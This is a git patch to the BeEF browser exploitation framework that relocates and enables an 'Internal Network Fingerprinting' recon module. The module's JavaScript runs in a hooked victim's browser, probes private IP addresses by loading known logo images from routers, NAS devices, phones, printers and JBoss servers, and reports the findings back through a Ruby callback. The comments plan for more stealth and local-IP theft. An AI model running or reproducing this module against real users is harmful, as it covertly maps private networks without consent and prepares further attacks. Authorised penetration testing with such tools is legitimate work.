From 66a90cac76ffc4f0760e58b20c34649d44b959e2 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@b87d56ec-f9c0-11de-8c8a-61c5e9addfc9>
Date: Thu, 19 May 2011 12:02:23 +0000
Subject: [PATCH] moved and renamed the Yokoso-like module to recon ->
 InternalNetworkFingerprinting

git-svn-id: https://beef.googlecode.com/svn/trunk@978 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
---
 .../network/detect_local_settings/config.yaml | 11 +--
 .../fingerprint_local_network.rb              | 70 -------------------
 .../command.js}                               |  9 ++-
 .../config.yaml                               | 11 +++
 .../internal_network_fingerprinting/module.rb | 60 ++++++++++++++++
 5 files changed, 79 insertions(+), 82 deletions(-)
 delete mode 100644 modules/network/detect_local_settings/fingerprint_local_network.rb
 rename modules/{network/detect_local_settings/fingerprint_local_network.js => recon/internal_network_fingerprinting/command.js} (86%)
 create mode 100644 modules/recon/internal_network_fingerprinting/config.yaml
 create mode 100644 modules/recon/internal_network_fingerprinting/module.rb

diff --git a/modules/network/detect_local_settings/config.yaml b/modules/network/detect_local_settings/config.yaml
index 5970ed7c4..5a320b3ec 100644
--- a/modules/network/detect_local_settings/config.yaml
+++ b/modules/network/detect_local_settings/config.yaml
@@ -8,13 +8,4 @@ beef:
             authors: ["pdp", "wade", "bm"]
             target:
                 working: ["FF", "C"]
-                not_working: ["IE"]
-        fingerprint_local_network:
-            enable: false 
-            category: "Network"
-            name: "Fingerprint local network"
-            description: "Scan common local network IP addresses for embedded devices."
-            authors: ["bcoles@gmail.com", "wade"]
-            target:
-                user_notify: ["FF", "IE"]
-                not_working: ["O"]
+                not_working: ["IE"]
\ No newline at end of file
diff --git a/modules/network/detect_local_settings/fingerprint_local_network.rb b/modules/network/detect_local_settings/fingerprint_local_network.rb
deleted file mode 100644
index 1262b7e62..000000000
--- a/modules/network/detect_local_settings/fingerprint_local_network.rb
+++ /dev/null
@@ -1,70 +0,0 @@
-module BeEF
-module Modules
-module Commands
-#
-# Fingerprint local network module
-# This module attempts to fingerprint embedded devices within the zombies'
-# local network. It does this by loading images on common local network
-# IP addresses then matching the image width, height and path to those
-# for a known device.
-#
-# TODO #
-#
-# Add IPv6 support
-# Add HTTPS support
-# -  Devices with invalid certs are blocked by IE and FF by default
-# Improve stealth
-# -  Load images with CSS "background:" CSS to avoid http auth login popups
-# Improve speed
-# -  Make IP addresses a user-configurable option rather than a hard-coded list
-# -  Detect local ip range first - using browser history and/or with java
-#    - History theft via CSS history is patched in modern browsers.
-#    - Local IP theft with Java is slow and may fail
-
-
-class Fingerprint_local_network < BeEF::Core::Command
-  
-  def initialize
-    super({
-      'Name' => 'Fingerprint local network',
-      'Description' => 'Scan common local network IP addresses for embedded devices.',
-      'Category' => 'Network',
-      'Author' => ['bcoles@gmail.com', 'wade'],
-      'File' => __FILE__
-    })
-
-    # Doesn't work in FF4 (but works in 3.x)    
-    set_target({
-        'verified_status' =>  VERIFIED_USER_NOTIFY,
-        'browser_name' =>     FF
-    })
-
-    set_target({
-	'verified_status' =>  VERIFIED_NOT_WORKING,
-	'browser_name' =>     O
-    })
-
-    set_target({
-        'verified_status' =>  VERIFIED_USER_NOTIFY,
-        'browser_name' =>     IE
-    })
-    
-    use_template!
-  end
-  
-  def callback
-	content = {}
-	content['device'] =@datastore['device'] if not @datastore['device'].nil?
-	content['url'] = @datastore['url'] if not @datastore['url'].nil?
-	if content.empty?
-		content['fail'] = 'Did not detect any local network devices'
-	end
-	save content
-  end
-
-end
-  
-end
-end
-end
-
diff --git a/modules/network/detect_local_settings/fingerprint_local_network.js b/modules/recon/internal_network_fingerprinting/command.js
similarity index 86%
rename from modules/network/detect_local_settings/fingerprint_local_network.js
rename to modules/recon/internal_network_fingerprinting/command.js
index c9ebbecc3..0a64d9551 100644
--- a/modules/network/detect_local_settings/fingerprint_local_network.js
+++ b/modules/recon/internal_network_fingerprinting/command.js
@@ -1,6 +1,7 @@
 beef.execute(function() {
 
 	var dom = document.createElement('b');
+
 	var ips = [
 		'http://192.168.0.1',
 		'http://192.168.0.100',
@@ -15,7 +16,8 @@ beef.execute(function() {
 		'http://192.168.100.1',
 		'http://192.168.100.254',
 		'http://192.168.123.1',
-		'http://192.168.123.254'
+		'http://192.168.123.254',
+        'http://192.168.10.1'
 	];
 	var urls = new Array(
 	new Array("QNAP NAS",":8080","/ajax_obj/img/running.gif",16,16),
@@ -29,8 +31,10 @@ beef.execute(function() {
 	new Array("Cisco IP Phone",":80","/Images/Logo",120,66),
 	new Array("Snom Phone",":80","/img/snom_logo.png",168,62),
 	new Array("Brother Printer",":80","/pbio/brother.gif",144,52),
-	new Array("HP LaserJet",":80","/hp/device/images/logo.gif",42,27)
+	new Array("HP LaserJet",":80","/hp/device/images/logo.gif",42,27),
+    new Array("JBoss Application server",":8080","/images/logo.gif",226,105)
 	);
+    //console.log("Array loaded [" + urls + "]");
 
 	// for each ip
 	for(var i=0; i < ips.length; i++) {
@@ -38,6 +42,7 @@ beef.execute(function() {
 		// for each url
 		for(var u=0; u < urls.length; u++) {
 			var img = new Image;
+            //console.log("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "]");
 			img.id = u;
 			img.src = ips[i]+urls[u][1]+urls[u][2];
 			//img.title = ips[i]+urls[u][1];
diff --git a/modules/recon/internal_network_fingerprinting/config.yaml b/modules/recon/internal_network_fingerprinting/config.yaml
new file mode 100644
index 000000000..bedc47c43
--- /dev/null
+++ b/modules/recon/internal_network_fingerprinting/config.yaml
@@ -0,0 +1,11 @@
+beef:
+    module:
+        internal_network_fingerprinting:
+            enable: true
+            category: "Recon"
+            name: "Internal Network Fingerprinting"
+            description: "Discover devices and applications in the internal network of the victim using signatures like default logo images/favicons (partially based on the Yokoso idea)"
+            authors: ["bcoles@gmail.com", "wade", "antisnatchor"]
+            target:
+                user_notify: ["FF", "IE"]
+                not_working: ["O"]
diff --git a/modules/recon/internal_network_fingerprinting/module.rb b/modules/recon/internal_network_fingerprinting/module.rb
new file mode 100644
index 000000000..678e75526
--- /dev/null
+++ b/modules/recon/internal_network_fingerprinting/module.rb
@@ -0,0 +1,60 @@
+#
+# Internal Network Fingerprinting
+# Discover devices and applications in the internal network of the victim using
+# signatures like default logo images/favicons (partially based on the Yokoso idea).
+# It does this by loading images on common/predefined local network
+# IP addresses then matching the image width, height and path to those
+# for a known device.
+#
+# TODO LIST
+# Add IPv6 support
+# Add HTTPS support
+# -  Devices with invalid certs are blocked by IE and FF by default
+# Improve stealth
+# -  Load images with CSS "background:" CSS to avoid http auth login popups
+# Improve speed
+# -  Make IP addresses a user-configurable option rather than a hard-coded list
+# -  Detect local ip range first - using browser history and/or with java
+#    - History theft via CSS history is patched in modern browsers.
+#    - Local IP theft with Java is slow and may fail
+
+
+class Internal_network_fingerprinting < BeEF::Core::Command
+  
+  def initialize
+    super({
+      'Name' => 'Internal Network Fingerprinting',
+      'Description' => 'Discover devices and applications in the internal network of the victim using signatures like default logo images/favicons (partially based on the Yokoso idea)',
+      'Category' => 'Recon',
+      'Author' => ['bcoles@gmail.com', 'wade', 'antisnatchor'],
+      'File' => __FILE__
+    })
+
+    set_target({
+        'verified_status' =>  VERIFIED_USER_NOTIFY,
+        'browser_name' =>     FF  # works also in FF 4.0.1
+    })
+
+    set_target({
+        'verified_status' =>  VERIFIED_NOT_WORKING,
+        'browser_name' =>     O
+    })
+
+    set_target({
+        'verified_status' =>  VERIFIED_USER_NOTIFY,
+        'browser_name' =>     IE
+    })
+    
+    use_template!
+  end
+  
+  def callback
+    content = {}
+    content['device'] =@datastore['device'] if not @datastore['device'].nil?
+    content['url'] = @datastore['url'] if not @datastore['url'].nil?
+    if content.empty?
+      content['fail'] = 'No devices/applications have been discovered.'
+    end
+    save content
+  end
+end